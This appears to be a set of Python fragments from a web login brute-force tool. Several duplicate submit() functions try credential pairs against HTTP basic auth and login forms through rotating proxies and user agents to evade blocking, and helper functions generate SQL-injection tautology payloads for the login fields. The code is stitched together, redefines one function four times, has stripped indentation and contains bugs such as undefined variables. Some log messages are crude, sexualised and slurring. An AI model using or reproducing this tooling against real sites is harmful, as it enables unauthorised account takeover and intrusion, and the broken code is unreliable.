def sCon():
conType = randomFromList(["equal", "static", "compare"])
# Could be faster than create a dict and call element from dict
if conType == "static":
return randomFromList(["not false", "true"])
elif conType == "compare":
genType = randomFromList(["like", "rlike", "not like", "gl"])
if genType == "gl":
_stri1, _stri2 = srand(stype="dig"), srand(stype="dig")
if int(_stri1) > int(_stri2):
return "%s > %s" % (_stri1, _stri2)
else:
return "%s > %s" % (_stri2, _stri1)
elif genType == "not like":
while True:
_stri1, _stri2 = srand(stype="char"), srand(stype="char")
# MAKE SURE WE ARE HAVING NOT LIKE
if _stri1 != _stri2:
break
return "'%s' %s '%s'" % (_stri1, genType, _stri2)
else:
_stri = srand(min=3, max=5, stype="char")
return "'%s' %s '%s'" % (_stri, genType, _stri)
elif conType == "equal":
genType = randomFromList(["char", "dig"])
_stri = srand(min=3, max=5, stype=genType)
if genType == "char":
return "'%s'='%s'" % (_stri, _stri)
elif genType == "dig":
return "%s=%s" % (_stri, _stri)
def submit(options, loginInfo, creds, result):
tryPassword, tryUsername = creds
realm = loginInfo[0]
fPassword, fUsername = loginInfo[1]
for cred in list(result.queue):
if tryUsername == cred[0]:
return True # don't run if find password of username
try:
proc = mBrowser(options.timeout)
if options.proxy:
proxyAddr = randomFromList(options.proxy)
proc.setproxy(proxyAddr)
proc.httpget_passwd(options.url, tryUsername, tryPassword, realm)
proc.open_url(options.url)
if options.verbose:
if options.proxy:
printf("[+] {%s: %s; %s: %s through %s}" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
else:
printf("[+] {%s: %s; %s: %s}" %(fUsername, tryUsername, fPassword, tryPassword), 'norm')
printf("[*] %s [%s]" %([tryUsername, tryPassword], proc.title()), "good")
result.put([options.url, tryUsername, tryPassword])
except Exception as err:
try:
if type(err.code) == int and err.code == 401:
if options.verbose:
if options.proxy:
printf("[+] {%s: %s; %s: %s through %s}" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
printf("[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr), "bad")
else:
printf("[+] {%s: %s; %s: %s}" %(fUsername, tryUsername, fPassword, tryPassword), 'norm')
printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
else:
printf("[x] %s: %s" %(err, creds[::-1]), "bad")
except:
die("[x] HTTP GET:", err)
def submit(options, loginInfo, creds, result):
tryPassword, tryUsername = creds
realm, [fPassword, fUsername] = loginInfo
if tryUsername in [x[1] for x in list(result.queue)]:
return True
try:
proc = Browser()
if options.proxy:
proxyAddr = randomFromList(options.proxy)
proc.setproxy(proxyAddr)
else:
proxyAddr = ""
# proc.httpget_passwd(options.url, tryUsername, tryPassword, realm) # BUG
resp = proc.open_url(options.url, auth=(tryUsername, tryPassword))
if options.verbose:
if options.proxy:
utils.printf("[+] [%s=(%s); %s=(%s)] <--> %s" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
if resp.status_code == 401:
if options.verbose:
if options.proxy:
utils.printf("[-] Failed [%s=(%s); %s=(%s)] <--> %s" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'bad')
elif resp.status_code == 403:
utils.printf("[x] 403 forbidden: [%s:%s] %s" %(tryUsername, tryPassword, proxyAddr), "bad")
elif resp.status_code == 404:
utils.printf("[x] 404 not found: [%s:%s] %s" %(tryUsername, tryPassword, proxyAddr), "bad")
elif resp.status_code >= 500:
utils.printf("[x] %s Server error: [%s:%s] <--> %s" %(resp.status_code, tryUsername, tryPassowrd, proxyAddr))
else:
utils.printf("[*] Found: [%s:%s] [%s] --> %s" %(tryUsername, tryPassword, proc.get_title(), proxyAddr), "good")
result.put([options.url, tryUsername, tryPassword])
except Exception as err:
utils.die("[x] HTTP GET:", err)
def submit(options, loginInfo, tryCred, result):
# if options.engine == "mechanize":
# from libs.mbrowser import mBrowser as Browser
# proc = Browser(options.timeout) # TODO remove here
# elif options.engine == "selenium":
# from libs.sbrowser import sBrowser as Browser
# proc = Browser() # TODO remove here
# else:
# pass # ERROR
# # Get login form field informations
# frmLoginID, frmFields = loginInfo
tryPassword, tryUsername = tryCred
# proc = Browser(options.timeout) # TODO recovery here
# BREAK if we had valid payload?
# if options.options["-p"] == "sqli" and len(list(result.queue)) > 1:
# return True
for cred in list(result.queue):
if tryUsername == cred[1]:
return True
try:
proc = Browser(options.timeout)
if options.proxy:
# Set proxy connect
proxyAddr = randomFromList(options.proxy)
proc.setproxy(proxyAddr)
proc.open_url(options.login_url)
proc.get_opts(
options) # TODO remove this fucntion in sbrowser and mbrowser
_form = parseLoginForm(proc.forms())
if not _form:
if options.verbose:
printf(
"[x] LoginBrute: No login form found. Possibly get blocked!"
)
return False
else:
frmCtrl, frmFields = _form
frmLoginID, btnSubmit = frmCtrl
if options.verbose and loginInfo != _form:
printf("[+] Warning: Form field has been changed!")
# Select login form
# page_title = proc.title()
# Send request
# Reload the browser. For javascript redirection and others...
# proc.reload()
# If no login form -> maybe success. Check conditions
proc.xsubmit(frmCtrl, frmFields, tryCred)
if options.verbose:
if options.proxy:
printf(
"[+] {%s: %s; %s: %s} through %s" %
(frmFields[1], tryUsername, frmFields[0], tryPassword,
proxyAddr), 'norm')
else:
if len(frmFields) == 2:
printf(
"[+] {%s: %s; %s: %s}" %
(frmFields[1], tryUsername, frmFields[0], tryPassword),
'norm')
else:
printf("[+] {%s: %s}" % (frmFields[0], tryPassword),
'norm')
if not parseLoginForm(proc.forms()): # != loginInfo:
test_result = check_condition(options, proc, loginInfo)
if test_result == 1:
#printf("[*] Page title: ['%s']" %(proc.title()), "good")
# "If we tried login form with username+password field"
if tryUsername:
printf(
"[*] %s [%s]" %
([tryUsername, tryPassword], proc.get_title()), "good")
# "Else If we tried login form with password field only"
else:
printf("[*] %s []" % ([tryPassword], proc.get_title()),
"good")
result.put([options.url, tryUsername, tryPassword])
elif test_result == 2 and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" % ([tryUsername, tryPassword]), "norm")
else:
# Possibly Error. But sometime it is true
if options.verbose:
printf(
"[x] Get error page: %s" %
([tryUsername, tryPassword]), "bad")
printf(" [x] Page title: ['%s']" % (proc.get_title()),
"bad")
# "Login form is still there. Oops"
else:
# TODO test if web has similar text (static)
if check_sqlerror(proc.get_resp()) and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" % ([tryUsername, tryPassword]), "norm")
if options.verbose:
if options.proxy:
printf(
"[-] Failed: %s through %s" %
([tryUsername, tryPassword], proxyAddr), "bad")
else:
printf("[-] Failed: %s" % ([tryUsername, tryPassword]),
"bad")
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
try:
# Unauthenticated
if type(err.code) == int and err.code == 401:
if options.verbose:
printf("[-] Failed: %s" % ([tryUsername, tryPassword]),
"bad")
# Server misconfiguration? Panel URL is deleted or wrong
elif error.code == 404:
printf("[x] %s: %s" % (error, tryCred[::-1]), "bad")
if options.verbose:
printf(" %s" % (proc.geturl()), "bad")
# Other error code
else:
if options.verbose:
printf("[x] (%s): %s" % (proc.geturl(), tryCred[::-1]),
"bad")
except:
# THIS BLOCKED BY WAF
printf("[x] Loginbrute: %s" % (error), "bad")
return False
finally:
proc.close()
def useragent(self):
# Try random agent everytime it is called
# TODO better useragent with library (or create my own - takes time)
return randomFromList(data.getAgent().split("\n"))
def sEnd():
return randomFromList(["-- --", "#", "--"])
def cCon():
return randomFromList(["or", "||"])
def submit(options, loginInfo, tryCred, result):
# if options.tech == "mechanize":
# from libs.mbrowser import mBrowser as Browser
# elif options.tech == "selenium":
# from libs.sbrowser import sBrowser as Browser
# frmLoginID, frmFields = loginInfo
tryPassword, tryUsername = tryCred
# proc = Browser(options.timeout) # TODO recovery here
# BREAK if we had valid payload?
# if options.options["-p"] == "sqli" and len(list(result.queue)) > 1:
# return True
if tryUsername in [x[1] for x in list(result.queue)]:
return True
from libs.mbrowser import Browser
try:
proc = Browser()
if options.proxy:
# Set proxy connect
proxyAddr = randomFromList(options.proxy)
proc.setproxy(proxyAddr)
else:
proxyAddr = ""
proc.open_url(options.login_url)
_form = parseLoginForm(proc.forms())
if not _form:
if options.verbose:
utils.printf(
"[!] Bruteforcer: No login form found, possibly get blocked by WAF of a sort"
)
return False
else:
frmCtrl, frmFields = _form
frmLoginID, btnSubmit = frmCtrl
if options.verbose and loginInfo != _form:
utils.printf("[!] Warning: Login Forms field has been changed...")
# Select login form
# page_title = proc.title()
# Send request
# Reload the browser. For javascript redirection and others...
# proc.reload()
# If no login form -> maybe success. Check conditions
resp = proc.xsubmit(frmCtrl, frmFields, tryCred)
if options.verbose:
if len(frmFields) == 2:
utils.printf(
"[+] [%s=(%s); %s=(%s)] <--> %s" %
(frmFields[1], tryUsername, frmFields[0], tryPassword,
proxyAddr), 'norm')
else:
utils.printf(
"[+] [%s=(%s)] <--> %s" %
(frmFields[0], tryPassword, proxyAddr), 'norm')
if not parseLoginForm(proc.forms()): # != loginInfo:
test_result = check_condition(options, proc, loginInfo)
if test_result == 1:
#utils.printf("[*] Page title: ['%s']" %(proc.title()), "good")
# "If we tried login form with username+password field"
if tryUsername:
if resp.status_code == 403:
utils.printf(
"[!] 403 Forbidden to touch titties: [%s:%s] <--> %s"
% (tryUsername, tryPassword, proxyAddr), "bad")
elif resp.status_code == 404:
utils.printf(
"[!] 404 titties not found... gayyyy: [%s:%s] <--> %s"
% (tryUsername, tryPassword, proxyAddr), "bad")
elif resp.status_code >= 500:
utils.printf(
"[!] %s Server error.. got slapped [%s:%s] <--> %s"
% (resp.status_code, tryUsername, tryPassword,
proxyAddr), "bad")
else:
utils.printf(
"[+] Found... BIG TITTIESSSS!!: [%s:%s] [%s]" %
(tryUsername, tryPassword, proc.get_title()),
"good")
result.put([options.url, tryUsername, tryPassword])
# "Else If we tried login form with password field only"
else:
if resp.status_code == 403:
utils.printf(
"[!] 403 Forbidden to touch titties: [%s:%s] %s" %
(tryUsername, tryPassword, proxyAddr), "bad")
elif resp.status_code == 404:
utils.printf(
"[!] 404 titties not found... gayyyy: [%s:%s] %s" %
(tryUsername, tryPassword, proxyAddr), "bad")
elif resp.status_code >= 500:
utils.printf(
"[!] %s Server error.. got slapped: [%s:%s] %s" %
(resp.status_code, tryUsername, tryPassword,
proxyAddr), "bad")
else:
utils.printf(
"[+] Found... BIG TITTIESSSS!!: [%s] [%s]" %
(tryPassword, proc.get_title()), "good")
result.put([options.url, tryUsername, tryPassword])
elif test_result == 2 and options.verbose:
utils.printf(
"[+] SQL Injection vulnerability found in login or system. you already know what that means ;) "
)
utils.printf(" %s" % ([tryUsername, tryPassword]), "norm")
else:
# Possibly a stupid error but sometimes it COULD be true .-.
if options.verbose:
utils.printf(
"[!] Get error page: %s" %
([tryUsername, tryPassword]), "bad")
utils.printf(
" [*] Page title: ['%s']" % (proc.get_title()),
"bad")
# "Login form might still be there soo uhh... i made an oopsie??"
else:
# TODO test if web has similar text (static)
if check_sqlerror(proc.get_resp()) and options.verbose:
utils.printf(
"[+] SQL Injection vulnerability found in login or system. you already know what that means ;) "
)
utils.printf(" %s" % ([tryUsername, tryPassword]), "norm")
if options.verbose:
if tryUsername:
utils.printf(
"[-] Failed: [%s:%s] <--> %s ==> %s" %
(tryUsername, tryPassword, proxyAddr,
proc.get_title()), "bad")
else:
utils.printf(
"[-] Failed: [%s] <--> %s ==> %s" %
(tryPassword, proxyAddr, proc.get_title()), "bad")
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
try:
# Unauthenticated
if type(err.code) == int and err.code == 401:
if options.verbose:
utils.printf(
"[-] Failed: %s" % ([tryUsername, tryPassword]), "bad")
# Server misconfiguration or owner is stupid? Panel URL is deleted or wrong.. if so f**k them!
elif error.code == 404:
utils.printf("[x] %s: %s" % (error, tryCred[::-1]), "bad")
if options.verbose:
utils.printf(" %s" % (proc.url()), "bad")
# Other error code
else:
if options.verbose:
utils.printf("[x] (%s): %s" % (proc.url(), tryCred[::-1]),
"bad")
except:
# THIS BLOCKED BY WAF
utils.printf("[x] Loginbrute: %s" % (error), "bad")
return False
finally:
proc.close()